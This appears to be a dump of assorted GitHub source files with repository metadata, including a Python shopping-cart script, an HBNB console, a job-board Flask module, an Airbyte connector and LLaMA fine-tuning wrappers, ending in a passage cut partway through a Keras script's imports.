+{"seq_id":"23551019892","text":"#adding items into shopping cart\n\nprint(\"shopping cart\")\nitem_list=[]\nwhile(True):\n item=input(\"enter the item name:\")\n qty=int(input(\"enter quantity:\"))\n each_item=[]\n each_item.append(item)\n each_item.append(qty)\n item_list.append(each_item)\n more=input(\"do you want to continue(yes/no):\")\n if(more==\"no\"):\n break\nprint(\"you have purchased:\",item_list)\n","repo_name":"1madhura/python","sub_path":"shoppingcart.py","file_name":"shoppingcart.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30208858666","text":"#!/usr/bin/python3\n\"\"\" contains the entry point of the command interpreter 
\"\"\"\n\nimport cmd\nimport re\nfrom shlex import split\nfrom models.base_model import BaseModel\nfrom models.engine.file_storage import FileStorage\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\nimport models\n\n\ndef parse(arg):\n curly_braces = re.search(r\"\\{(.*?)\\}\", arg)\n brackets = re.search(r\"\\[(.*?)\\]\", arg)\n if curly_braces is None:\n if brackets is None:\n return [i.strip(\",\") for i in split(arg)]\n else:\n lexer = split(arg[:brackets.span()[0]])\n retl = [i.strip(\",\") for i in lexer]\n retl.append(brackets.group())\n return retl\n else:\n lexer = split(arg[:curly_braces.span()[0]])\n retl = [i.strip(\",\") for i in lexer]\n retl.append(curly_braces.group())\n return retl\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\"command interpreter for HBNB\"\"\"\n __classList = {\n \"BaseModel\",\n \"User\",\n \"Place\",\n \"State\",\n \"City\",\n \"Amenity\",\n \"Review\"\n }\n\n prompt = \"(hbnb) \"\n\n def default(self, arg):\n \"\"\"Default behavior for cmd module when input is invalid\"\"\"\n argdict = {\n \"all\": self.do_all,\n \"show\": self.do_show,\n \"destroy\": self.do_destroy,\n \"count\": self.do_count,\n \"update\": self.do_update\n }\n match = re.search(r\"\\.\", arg)\n if match is not None:\n argl = [arg[:match.span()[0]], arg[match.span()[1]:]]\n match = re.search(r\"\\((.*?)\\)\", argl[1])\n if match is not None:\n command = [argl[1][:match.span()[0]], match.group()[1:-1]]\n if command[0] in argdict.keys():\n call = \"{} {}\".format(argl[0], command[1])\n return argdict[command[0]](call)\n print(\"*** Unknown syntax: {}\".format(arg))\n return False\n\n def do_quit(self, arg):\n \"\"\"quit command exits the program\"\"\"\n return True\n\n def do_EOF(self, arg):\n \"\"\"EOF command exits the program\"\"\"\n print()\n return True\n\n def emptyline(self):\n \"\"\"Does notting when empty line is received\"\"\"\n pass\n\n def do_create(self, cls):\n \"\"\"Usage: create <class>\n creates a new instance and prints its id\"\"\"\n if len(cls) == 0:\n print(\"** class name missing **\")\n elif cls not in HBNBCommand.__classList:\n print(\"** class doesn't exist **\")\n else:\n new = eval(cls)()\n models.storage.save()\n print(new.id)\n\n def do_show(self, args):\n \"\"\"Usage: show <class> <id> or <class>.show(<id>)\n prints the string representation of an instance based\n on the class name and id\"\"\"\n objD = models.storage.all()\n argList = parse(args)\n if len(argList) == 0:\n print(\"** class name missing **\")\n elif argList[0] not in HBNBCommand.__classList:\n print(\"** class doesn't exist **\")\n elif len(argList) < 2:\n print(\"** instance id missing **\")\n elif argList[0] + \".\" + argList[1] not in objD:\n print(\"** no instance found **\")\n else:\n key = argList[0] + \".\" + argList[1]\n obj = objD[key]\n print(obj)\n\n def do_destroy(self, args):\n \"\"\"Usage: destroy <class> <id> or <class>.destroy(<id>)\n deletes an instance based on the class name and id\"\"\"\n objD = models.storage.all()\n argList = parse(args)\n if len(argList) == 0:\n print(\"** class name missing **\")\n elif argList[0] not in HBNBCommand.__classList:\n print(\"** class doesn't exist **\")\n elif len(argList) < 2:\n print(\"** instance id missing **\")\n elif argList[0] + \".\" + argList[1] not in objD:\n print(\"** no instance found **\")\n else:\n key = argList[0] + \".\" + argList[1]\n obj = objD[key]\n del objD[key]\n 
 models.storage.save()\n\n def do_all(self, arg):\n \"\"\"Usage: all or all <class> or <class>.all()\n prints all string representation of all instances based or not\n on the class name\"\"\"\n objD = models.storage.all()\n argList = parse(arg)\n objList = []\n if len(argList) > 0 and argList[0] not in HBNBCommand.__classList:\n print(\"** class doesn't exist **\")\n else:\n objList = []\n if len(argList) == 0:\n for obj in objD.values():\n objList.append(obj.__str__())\n else:\n for obj in objD.values():\n if argList[0] == (obj.to_dict())[\"__class__\"]:\n objList.append(obj.__str__())\n print(objList)\n\n def do_update(self, arg):\n \"\"\"Usage: update <class> <id> <attribute_name> <attribute_value>\n or <class>.update(<id>, <attribute_name>, <attribute_value>) or\n <class>.update(<id>, <dictionary>)\n updates an instance based on the class name and id by adding or\n updating attribute (save the change to the JSON file)\n \"\"\"\n objD = models.storage.all()\n argL = parse(arg)\n\n if len(argL) == 0:\n print(\"** class name missing **\")\n return False\n elif argL[0] not in HBNBCommand.__classList:\n print(\"** class doesn't exist **\")\n return False\n elif len(argL) < 2:\n print(\"** instance id missing **\")\n return False\n elif argL[0] + \".\" + argL[1] not in objD:\n print(\"** no instance found **\")\n return False\n elif len(argL) < 3:\n print(\"** attribute name missing **\")\n return False\n elif len(argL) < 4:\n try:\n type(eval(argL[2])) != dict\n except NameError:\n print(\"** value missing **\")\n return False\n\n if len(argL) == 4:\n obj = objD[\"{}.{}\".format(argL[0], argL[1])]\n if argL[2] in obj.__class__.__dict__.keys():\n valtype = type(obj.__class__.__dict__[argL[2]])\n obj.__dict__[argL[2]] = valtype(argL[3])\n else:\n obj.__dict__[argL[2]] = argL[3]\n elif type(eval(argL[2])) == dict:\n obj = objD[\"{}.{}\".format(argL[0], argL[1])]\n for k, v in eval(argL[2]).items():\n if (k in obj.__class__.__dict__.keys() and\n type(obj.__class__.__dict__[k]) in {str, int, float}):\n valtype = type(obj.__class__.__dict__[k])\n obj.__dict__[k] = valtype(v)\n else:\n obj.__dict__[k] = v\n models.storage.save()\n\n def do_count(self, arg):\n \"\"\"Usage: count <class> or <class>.count()\n Retrieve the number of instances of a given class.\"\"\"\n argl = parse(arg)\n count = 0\n for obj in models.storage.all().values():\n if argl[0] == obj.__class__.__name__:\n count += 1\n print(count)\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","repo_name":"Dcode3244/AirBnB_clone","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":7378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"29217348824","text":"__author__ = 'zhangxa'\n\nfrom curl import Curl\nimport pycurl\n\nfrom html.parser import HTMLParser\nfrom htmlParser.htmlParser import UrlHtmlParser\nfrom download.downFile import DownFile\nfrom urlHandler.urlHandler import UrlBaseHandler\nfrom urlQueue.urlQueue import UrlQueue\n\nstart_url = \"http://www.pcgames.com.cn/\"\nc = Curl()\nc.set_url(start_url)\ndata = c.get()\ninfo = c.info()\n#print(info)\n\ndef get_charset(c_type):\n charset=None\n try:\n if c_type and 'charset' in c_type:\n start = c_type.find('charset=')\n charset_str = c_type[start:]\n end = charset_str.find(' ')\n if end > -1:\n charset = charset_str[len('charset='):end]\n else:\n charset = charset_str[len('charset='):]\n except:\n return 'UTF-8'\n if charset is None:\n return 'UTF-8'\n return charset\n\n#print(get_charset('text/html charset=gb2312 UTF-9'))\nprint(get_charset(info['content-type']))\nparser = HTMLParser()\nparser.feed(data.decode(\"GBK\"))\nc.close()","repo_name":"happyAnger6/anger6Spider","sub_path":"test/test_one_url.py","file_name":"test_one_url.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"96"}
+{"seq_id":"33148487900","text":"def game_of_life(tests):\n    for _ in range(tests):\n        board = read_board()\n        for _ in range(100):\n            next_board = copy_board(board)\n            for i in range(5):\n                for j in range(5):\n                    check_cell(board, next_board, i, j)\n            board = next_board\n        if is_alive(board):\n            print(\"yes\")\n        else:\n            print(\"no\")\n\ndef check_cell(board, next_board, i, j):\n    count = count_neighbours(board, i, j)\n    if board[i][j] == 1:\n        if count < 2 or count > 3:\n            next_board[i][j] = 0\n    else:\n        if count == 3:\n            next_board[i][j] = 1\n\ndef count_neighbours(board, i, j):\n    count = 0\n    for x in range(i-1, i+2):\n        for y in range(j-1, j+2):\n            if x == i and y == j:\n                continue\n            x = x % 5\n            y = y % 5\n            if board[x][y] == 1:\n                count += 1\n    return count\n\ndef is_alive(board):\n    for i in range(5):\n        for j in range(5):\n            if board[i][j] == 1:\n                return True\n    return False\n\ndef read_board():\n    board = []\n    for _ in range(5):\n        board.append([int(c) for c in input()])\n    return board\n\ndef copy_board(board):\n    return [row[:] for row in board]\n\ntests = int(input())\ngame_of_life(tests)","repo_name":"Olszewski-Jakub/Matury","sub_path":"SPOJ/Level 4/JZYCIE - Gra w życie.py","file_name":"JZYCIE - Gra w życie.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"25722070321","text":"from ..Types.Exceptions import *\n\nclass Skip:\n    \"\"\"\n    skip: Bypasses a specified number of elements in a sequence and then returns the remaining elements\n\n    >>> Enumerable<T> skip<T>(int count);\n    \"\"\"\n    def skip(self, count):\n        def _skip(data):\n            nonlocal count\n            for item in data:\n                if count <= 0:\n                    yield item\n                count -= 1\n        return self._extend(_skip)\n","repo_name":"hachiko-8ko/join-to-python","sub_path":"src/join_to_python/EnumerableType/Skip.py","file_name":"Skip.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"27098325561","text":"from typing import Any, Dict, Iterable, List, Mapping, MutableMapping, Optional, Tuple\n\nimport pendulum\nimport requests\nfrom airbyte_cdk import AirbyteLogger\nfrom airbyte_cdk.sources import AbstractSource\nfrom airbyte_cdk.sources.streams import Stream\nfrom airbyte_cdk.sources.streams.http import HttpStream\nfrom pendulum import DateTime\nimport genson\n\nclass HttpRequest(HttpStream):\n\n    date_field_name = \"date\"\n\n    # HttpStream related fields\n    cursor_field = date_field_name\n    primary_key = \"\"\n\n    def __init__(self, baseUrl: str, conf: Mapping[str, Any]):\n        super().__init__()\n        self._url_base = baseUrl\n        print(f\"BASE URL : {baseUrl}\")\n        if \"start_date\" in conf:\n            self._start_date = conf[\"start_date\"]\n        else:\n            self._start_date = None\n        if(\"access_key\" in conf):\n            self.access_key = conf[\"access_key\"]\n        else:\n            self.access_key = None\n    \n    @property\n    def url_base(self) -> str:\n        print(f\"returning base url {self._url_base}\")\n        return self._url_base\n\n    def path(\n        self, stream_state: Mapping[str, Any] = None, stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
next_page_token: Mapping[str, Any] = None\n ) -> str:\n return \"\"\n\n def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:\n return None\n\n def request_params(self, **kwargs) -> MutableMapping[str, Any]:\n params = {}\n print(\"Getting params\")\n if self.access_key is not None:\n params[\"access_key\"] = self.access_key\n\n return params\n\n def get_json_schema(self) -> Mapping[str, Any]:\n \"\"\"\n :return: A dict of the JSON schema representing this stream.\n\n The default implementation of this method looks for a JSONSchema file with the same name as this stream's \"name\" property.\n Override as needed.\n \"\"\"\n # TODO show an example of using pydantic to define the JSON schema, or reading an OpenAPI spec\n resp = requests.get(self.url_base)\n jsonBody = resp.json()\n s = genson.Schema()\n s.add_object(jsonBody)\n return s.to_dict()\n\n def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:\n response_json = response.json()\n yield response_json\n\n #def stream_slices(self, stream_state: Mapping[str, Any] = None, **kwargs) -> Iterable[Optional[Mapping[str, Any]]]:\n # stream_state = stream_state or {}\n # start_date = pendulum.parse(stream_state.get(self.date_field_name, self._start_date))\n # return chunk_date_range(start_date, self.ignore_weekends)\n\n # def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]):\n # current_stream_state = current_stream_state or {}\n # current_stream_state[self.date_field_name] = max(\n # latest_record[self.date_field_name], current_stream_state.get(self.date_field_name, self._start_date)\n # )\n # return current_stream_state\n\n\n# def chunk_date_range(start_date: DateTime, ignore_weekends: bool) -> Iterable[Mapping[str, Any]]:\n# \"\"\"\n# Returns a list of each day between the start date and now. 
Ignore weekends since exchanges don't run on weekends.\n# The return value is a list of dicts {'date': date_string}.\n# \"\"\"\n# days = []\n# now = pendulum.now()\n# while start_date < now:\n# day_of_week = start_date.day_of_week\n# if day_of_week != pendulum.SATURDAY and day_of_week != pendulum.SUNDAY or not ignore_weekends:\n# days.append({\"date\": start_date.to_date_string()})\n# start_date = start_date.add(days=1)\n\n# return days\n\n\nclass SourceHttpRequest(AbstractSource):\n def check_connection(self, logger: AirbyteLogger, config: Mapping[str, Any]) -> Tuple[bool, Any]:\n try:\n params = {}\n\n #params[\"access_key\"] = config[\"access_key\"]\n\n resp = requests.get(f\"{config['base_url']}\", params=params)\n status = resp.status_code\n logger.info(f\"Ping response code: {status}\")\n if status == 200:\n return True, None\n # When API requests is sent but the requested data is not available or the API call fails\n # for some reason, a JSON error is returned.\n # https://exchangeratesapi.io/documentation/#errors\n error = resp.json().get(\"error\")\n code = error.get(\"code\")\n message = error.get(\"message\") or error.get(\"info\")\n # If code is base_currency_access_restricted, error is caused by switching base currency while using free\n # plan\n if code == \"base_currency_access_restricted\":\n message = f\"{message} (this plan doesn't support selecting the base currency)\"\n return False, message\n except Exception as e:\n return False, e\n\n def streams(self, config: Mapping[str, Any]) -> List[Stream]:\n return [HttpRequest(config.get(\"base_url\"), config)]\n","repo_name":"Veronneau-Techno-Conseil/airbyte-connectors","sub_path":"json-svc/source_http_request/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11883946492","text":"from typing import Iterable, List, Optional, Union\nfrom pytorch_lightning.loggers import Logger\n\nfrom xturing.engines.llama_engine import (\n LLamaEngine,\n LLamaInt8Engine,\n LlamaLoraEngine,\n LlamaLoraInt8Engine,\n LlamaLoraInt4Engine,\n)\nfrom xturing.models.causal import (\n CausalInt8Model,\n CausalLoraInt8Model,\n CausalLoraModel,\n CausalModel,\n)\nfrom xturing.trainers.base import BaseTrainer\nfrom xturing.datasets.instruction_dataset import InstructionDataset\nfrom xturing.datasets.text_dataset import TextDataset\nfrom xturing.trainers.lightning_trainer import LightningTrainer\n\n\nclass Llama(CausalModel):\n config_name: str = \"llama\"\n\n def __init__(self, weights_path: Optional[str] = None):\n super().__init__(LLamaEngine.config_name, weights_path)\n\n\nclass LlamaLora(CausalLoraModel):\n config_name: str = \"llama_lora\"\n\n def __init__(self, weights_path: Optional[str] = None):\n super().__init__(LlamaLoraEngine.config_name, weights_path)\n\n\nclass LlamaInt8(CausalInt8Model):\n config_name: str = \"llama_int8\"\n\n def __init__(self, weights_path: Optional[str] = None):\n super().__init__(LLamaInt8Engine.config_name, weights_path)\n\n\nclass LlamaLoraInt8(CausalLoraInt8Model):\n config_name: str = \"llama_lora_int8\"\n\n def __init__(self, weights_path: Optional[str] = None):\n super().__init__(LlamaLoraInt8Engine.config_name, weights_path)\n\n\nclass LlamaLoraInt4(CausalLoraInt8Model):\n config_name: str = \"llama_lora_int4\"\n\n def _make_trainer(self, dataset: Union[TextDataset, InstructionDataset], \n logger: Union[Logger, Iterable[Logger], bool] = True):\n return BaseTrainer.create(\n 
LightningTrainer.config_name,\n self.engine,\n dataset,\n self._make_collate_fn(dataset),\n int(self.finetuning_args.num_train_epochs),\n int(self.finetuning_args.batch_size),\n float(self.finetuning_args.learning_rate),\n self.finetuning_args.optimizer_name,\n True,\n True,\n lora_type=32,\n logger=logger,\n )\n\n def __init__(self, weights_path: Optional[str] = None):\n super().__init__(LlamaLoraInt4Engine.config_name, weights_path)\n","repo_name":"karim1104/xturing-202305","sub_path":"src/xturing/models/llama.py","file_name":"llama.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16064983907","text":"from ipclasses import IpVisual\nfrom usclasses import UsSearchs\n\nclass UsVisual(IpVisual):\n \n def visual(self): \n foo = UsSearchs(self._request, mode=self._mode)\n \n command = { \n 'visualNum' : foo.vis_num,\n 'visualClassify' : foo.vis_cla,\n 'visualIpc' : foo.vis_ipc,\n 'visualPerson' : foo.vis_per\n } \n\n return command[self._mode]()\n","repo_name":"jochangmin22/techvisor","sub_path":"usclasses/usVisualClass.py","file_name":"usVisualClass.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32400966546","text":"import bleach\nfrom datetime import datetime, timedelta\nfrom markdown import markdown\nfrom difflib import SequenceMatcher\n\nfrom flask import (\n abort,\n flash,\n g,\n redirect,\n render_template,\n request,\n url_for,\n session,\n )\nfrom flask.ext.mail import Message\nfrom hasjob import app, forms, mail, lastuser\nfrom hasjob.models import (\n agelimit,\n db,\n JobCategory,\n JobType,\n JobPost,\n JobPostReport,\n POSTSTATUS,\n ReportCode,\n unique_hash,\n )\nfrom hasjob.twitter import tweet\nfrom hasjob.uploads import uploaded_logos\nfrom hasjob.utils import get_email_domain, get_word_bag, md5sum\nfrom hasjob.views import ALLOWED_TAGS\nfrom hasjob.views.display import webmail_domains\n\n\n@app.route('/view/<hashid>', methods=('GET', 'POST'))\ndef jobdetail(hashid):\n post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n if post.status in [POSTSTATUS.DRAFT, POSTSTATUS.PENDING]:\n if post.edit_key not in session.get('userkeys', []):\n abort(403)\n if post.status in [POSTSTATUS.REJECTED, POSTSTATUS.WITHDRAWN]:\n abort(410)\n reportform = forms.ReportForm()\n reportform.report_code.choices = [(ob.id, ob.title) for ob in ReportCode.query.filter_by(public=True).order_by('seq')]\n rejectform = forms.RejectForm()\n if reportform.validate_on_submit():\n report = JobPostReport(post=post, reportcode_id=reportform.report_code.data)\n report.ipaddr = request.environ['REMOTE_ADDR']\n report.useragent = request.user_agent.string\n db.session.add(report)\n db.session.commit()\n if request.is_xhr:\n return \"<p>Thanks! This job listing has been flagged for review.</p>\" # FIXME: Ugh!\n else:\n flash(\"Thanks! 
This job listing has been flagged for review.\", \"interactive\")\n elif request.method == 'POST' and request.is_xhr:\n return render_template('inc/reportform.html', reportform=reportform, ajaxreg=True)\n return render_template('detail.html', post=post, reportform=reportform, rejectform=rejectform, siteadmin=lastuser.has_permission('siteadmin'), webmail_domains=webmail_domains)\n\n\n@app.route('/reject/<hashid>', methods=('GET', 'POST'))\n@lastuser.requires_permission('siteadmin')\ndef rejectjob(hashid):\n post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n if post.status in [POSTSTATUS.DRAFT, POSTSTATUS.PENDING]:\n if post.edit_key not in session.get('userkeys', []):\n abort(403)\n if post.status in [POSTSTATUS.REJECTED, POSTSTATUS.WITHDRAWN]:\n abort(410)\n rejectform = forms.RejectForm()\n if rejectform.validate_on_submit():\n post.closed_datetime = datetime.utcnow()\n post.review_comments = rejectform.reason.data\n post.review_datetime = datetime.utcnow()\n post.status = POSTSTATUS.REJECTED\n post.reviewer = g.user\n msg = Message(subject=\"Rejection of your job listing at the HasGeek Job Board\",\n recipients=[post.email])\n msg.body = render_template(\"reject_email.md\", post=post)\n msg.html = markdown(msg.body)\n mail.send(msg)\n db.session.commit()\n if request.is_xhr:\n return \"<p>This job listing has been rejected.</p>\"\n else:\n flash(\"This job listing has been rejected\", \"interactive\")\n elif request.method == 'POST' and request.is_xhr:\n return render_template('inc/rejectform.html', post=post, rejectform=rejectform, ajaxreg=True)\n return redirect(url_for('jobdetail', hashid=post.hashid))\n\n\n@app.route('/confirm/<hashid>', methods=('GET', 'POST'))\ndef confirm(hashid):\n post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n form = forms.ConfirmForm()\n if post.status == POSTSTATUS.REJECTED:\n abort(410)\n elif post.status == POSTSTATUS.DRAFT:\n if post.edit_key not in session.get('userkeys', []):\n abort(403)\n else:\n # Any other status: no confirmation required (via this handler)\n return redirect(url_for('jobdetail', hashid=post.hashid), code=302)\n if 'form.id' in request.form and form.validate_on_submit():\n # User has accepted terms of service. 
Now send email and/or wait for payment\n if not post.email_sent:\n msg = Message(subject=\"Confirmation of your job listing at the HasGeek Job Board\",\n recipients=[post.email])\n msg.body = render_template(\"confirm_email.md\", post=post)\n msg.html = markdown(msg.body)\n mail.send(msg)\n post.email_sent = True\n post.status = POSTSTATUS.PENDING\n db.session.commit()\n session.get('userkeys', []).remove(post.edit_key)\n session.modified = True # Since it won't detect changes to lists\n session.permanent = True\n return render_template('mailsent.html', post=post)\n return render_template('confirm.html', post=post, form=form)\n\n\n@app.route('/confirm/<hashid>/<key>')\ndef confirm_email(hashid, key):\n # If post is in pending state and email key is correct, convert to published\n # and update post.datetime to utcnow() so it'll show on top of the stack\n # This function expects key to be email_verify_key, not edit_key like the others\n post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n if post.status == POSTSTATUS.REJECTED:\n abort(410)\n elif post.status in [POSTSTATUS.CONFIRMED, POSTSTATUS.REVIEWED]:\n flash(\"This job listing has already been confirmed and published\", \"interactive\")\n return redirect(url_for('jobdetail', hashid=post.hashid), code=302)\n elif post.status == POSTSTATUS.DRAFT:\n # This should not happen. The user doesn't have this URL until they\n # pass the confirm form\n return redirect(url_for('confirm', hashid=post.hashid), code=302)\n elif post.status == POSTSTATUS.PENDING:\n if key != post.email_verify_key:\n abort(403)\n else:\n if app.config.get('THROTTLE_LIMIT', 0) > 0:\n post_count = JobPost.query.filter(JobPost.email_domain == post.email_domain).filter(\n JobPost.status > POSTSTATUS.PENDING).filter(\n JobPost.datetime > datetime.utcnow() - timedelta(days=1)).count()\n if post_count > app.config['THROTTLE_LIMIT']:\n flash(u\"We've received too many listings from %s in the last 24 hours. Please try again in a few hours. \"\n \"If you believe this to be an error, please email us at %s.\" % (post.email_domain,\n app.config['SUPPORT_EMAIL']), category='info')\n return redirect(url_for('index'))\n post.email_verified = True\n post.status = POSTSTATUS.CONFIRMED\n post.datetime = datetime.utcnow()\n db.session.commit()\n if app.config['TWITTER_ENABLED']:\n try:\n tweet(post.headline, url_for('jobdetail', hashid=post.hashid,\n _external=True), post.location)\n flash(\"Congratulations! Your job listing has been published and tweeted\",\n \"interactive\")\n except: # FIXME: Catch-all\n flash(\"Congratulations! Your job listing has been published \"\n \"(Twitter was not reachable for tweeting)\", \"interactive\")\n else:\n flash(\"Congratulations! 
Your job listing has been published\", \"interactive\")\n    return redirect(url_for('jobdetail', hashid=post.hashid), code=302)\n\n\n@app.route('/withdraw/<hashid>/<key>', methods=('GET', 'POST'))\ndef withdraw(hashid, key):\n    # TODO: Support for withdrawing job posts\n    post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n    form = forms.WithdrawForm()\n    if key != post.edit_key:\n        abort(403)\n    if post.status == POSTSTATUS.WITHDRAWN:\n        flash(\"Your job listing has already been withdrawn\", \"info\")\n        return redirect(url_for('index'), code=303)\n    if post.status not in [POSTSTATUS.CONFIRMED, POSTSTATUS.REVIEWED]:\n        flash(\"Your post cannot be withdrawn because it is not public\", \"info\")\n        return redirect(url_for('index'), code=303)\n    if form.validate_on_submit():\n        post.status = POSTSTATUS.WITHDRAWN\n        post.closed_datetime = datetime.utcnow()\n        db.session.commit()\n        flash(\"Your job listing has been withdrawn and is no longer available\", \"info\")\n        return redirect(url_for('index'), code=303)\n    return render_template(\"withdraw.html\", post=post, form=form)\n\n\n@app.route('/edit/<hashid>/<key>', methods=('GET', 'POST'))\ndef editjob(hashid, key, form=None, post=None, validated=False):\n    if form is None:\n        form = forms.ListingForm(request.form)\n        form.job_type.choices = [(ob.id, ob.title) for ob in JobType.query.filter_by(public=True).order_by('seq')]\n        form.job_category.choices = [(ob.id, ob.title) for ob in JobCategory.query.filter_by(public=True).order_by('seq')]\n    if post is None:\n        post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n    if key != post.edit_key:\n        abort(403)\n    # Don't allow email address to be changed once it's confirmed\n    if request.method == 'POST' and post.status >= POSTSTATUS.PENDING:\n        form.poster_email.data = post.email\n    if request.method == 'POST' and (validated or form.validate()):\n        form_description = bleach.linkify(bleach.clean(form.job_description.data, tags=ALLOWED_TAGS))\n        form_perks = bleach.linkify(bleach.clean(form.job_perks_description.data, tags=ALLOWED_TAGS)) if form.job_perks.data else ''\n        form_how_to_apply = form.job_how_to_apply.data\n        form_email_domain = get_email_domain(form.poster_email.data)\n        form_words = get_word_bag(u' '.join((form_description, form_perks, form_how_to_apply)))\n\n        similar = False\n        for oldpost in JobPost.query.filter(JobPost.email_domain == form_email_domain).filter(\n                JobPost.status > POSTSTATUS.PENDING).filter(\n                JobPost.datetime > datetime.utcnow() - agelimit).all():\n            if oldpost.id != post.id:\n                if oldpost.words:\n                    s = SequenceMatcher(None, form_words, oldpost.words)\n                    if s.ratio() > 0.6:\n                        similar = True\n                        break\n\n        if similar:\n            flash(\"This listing is very similar to an earlier listing. You may not relist the same job \"\n                \"in less than %d days. 
If you believe this to be an error, please email us at %s.\" % (agelimit.days,\n app.config['SUPPORT_EMAIL']), category='interactive')\n else:\n post.headline = form.job_headline.data\n post.type_id = form.job_type.data\n post.category_id = form.job_category.data\n post.location = form.job_location.data\n post.relocation_assist = form.job_relocation_assist.data\n post.description = form_description\n post.perks = form_perks\n post.how_to_apply = form_how_to_apply\n post.company_name = form.company_name.data\n post.company_url = form.company_url.data\n post.email = form.poster_email.data\n post.email_domain = form_email_domain\n post.md5sum = md5sum(post.email)\n post.hr_contact = form.hr_contact.data\n # To protect from gaming, don't allow words to be removed in edited listings once the post\n # has been confirmed. Just add the new words.\n if post.status >= POSTSTATUS.CONFIRMED:\n prev_words = post.words or ''\n else:\n prev_words = u''\n post.words = get_word_bag(u' '.join((prev_words, form_description, form_perks, form_how_to_apply)))\n\n if request.files['company_logo']:\n # The form's validator saved the processed logo in g.company_logo.\n thumbnail = g.company_logo\n logofilename = uploaded_logos.save(thumbnail, name='%s.' % post.hashid)\n post.company_logo = logofilename\n else:\n if form.company_logo_remove.data:\n post.company_logo = None\n\n db.session.commit()\n userkeys = session.get('userkeys', [])\n userkeys.append(post.edit_key)\n session['userkeys'] = userkeys\n session.permanent = True\n return redirect(url_for('jobdetail', hashid=post.hashid), code=303)\n elif request.method == 'POST':\n flash(\"Please correct the indicated errors\", category='interactive')\n elif request.method == 'GET':\n # Populate form from model\n form.job_headline.data = post.headline\n form.job_type.data = post.type_id\n form.job_category.data = post.category_id\n form.job_location.data = post.location\n form.job_relocation_assist.data = post.relocation_assist\n form.job_description.data = post.description\n form.job_perks.data = True if post.perks else False\n form.job_perks_description.data = post.perks\n form.job_how_to_apply.data = post.how_to_apply\n form.company_name.data = post.company_name\n form.company_url.data = post.company_url\n form.poster_email.data = post.email\n form.hr_contact.data = int(post.hr_contact or False)\n\n return render_template('postjob.html', form=form, no_email=post.status > POSTSTATUS.DRAFT)\n\n\n@app.route('/new', methods=('GET', 'POST'))\ndef newjob():\n form = forms.ListingForm()\n form.job_type.choices = [(ob.id, ob.title) for ob in JobType.query.filter_by(public=True).order_by('seq')]\n form.job_category.choices = [(ob.id, ob.title) for ob in JobCategory.query.filter_by(public=True).order_by('seq')]\n #if request.method == 'POST' and request.form.get('form.id') == 'newheadline':\n # POST request from the main page's Post a Job box.\n #form.csrf_token.data = form.generate_csrf_token(session)\n if request.method == 'POST' and request.form.get('form.id') != 'newheadline' and form.validate():\n # POST request from new job page, with successful validation\n # Move it to the editjob page for handling here forward\n post = JobPost(hashid = unique_hash(JobPost),\n ipaddr = request.environ['REMOTE_ADDR'],\n useragent = request.user_agent.string)\n db.session.add(post)\n return editjob(post.hashid, post.edit_key, form, post, validated=True)\n elif request.method == 'POST' and request.form.get('form.id') != 'newheadline':\n # POST request from new job page, with errors\n 
flash(\"Please correct the indicated errors\", category='interactive')\n\n # Render page. Execution reaches here under three conditions:\n # 1. GET request, page loaded for the first time\n # 2. POST request from main page's Post a Job box\n # 3. POST request from this page, with errors\n return render_template('postjob.html', form=form, no_removelogo=True)\n","repo_name":"seanbradley/hasjob","sub_path":"hasjob/views/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":15151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"4370754920","text":"import numpy as np\n\ndef coord_to_xyz(coord: np.ndarray, types: list)->str:\n \"\"\"Convert coordinates and types to xyz format.\n \n Parameters\n ----------\n coord: np.ndarray\n coordinates, Nx3 array\n types: list\n list of types\n \n Returns\n -------\n str\n xyz format string\n \n Examples\n --------\n >>> coord_to_xyz(np.ones((1,3)), [\"C\"])\n 1\n\n C 1.000000 1.000000 1.000000\n \"\"\"\n buff = [str(len(types)), '']\n for at, cc in zip(types, coord):\n buff.append(\"{} {:.6f} {:.6f} {:.6f}\".format(at, *cc))\n return \"\\n\".join(buff)\n","repo_name":"salinelake/dpdata","sub_path":"dpdata/xyz/xyz.py","file_name":"xyz.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"37766297841","text":"# -*- coding: utf-8 -*-\r\n#using python 3\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nimport math\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Embedding,Dropout,Dense,Reshape,Merge,Concatenate\r\nfrom sqlalchemy import 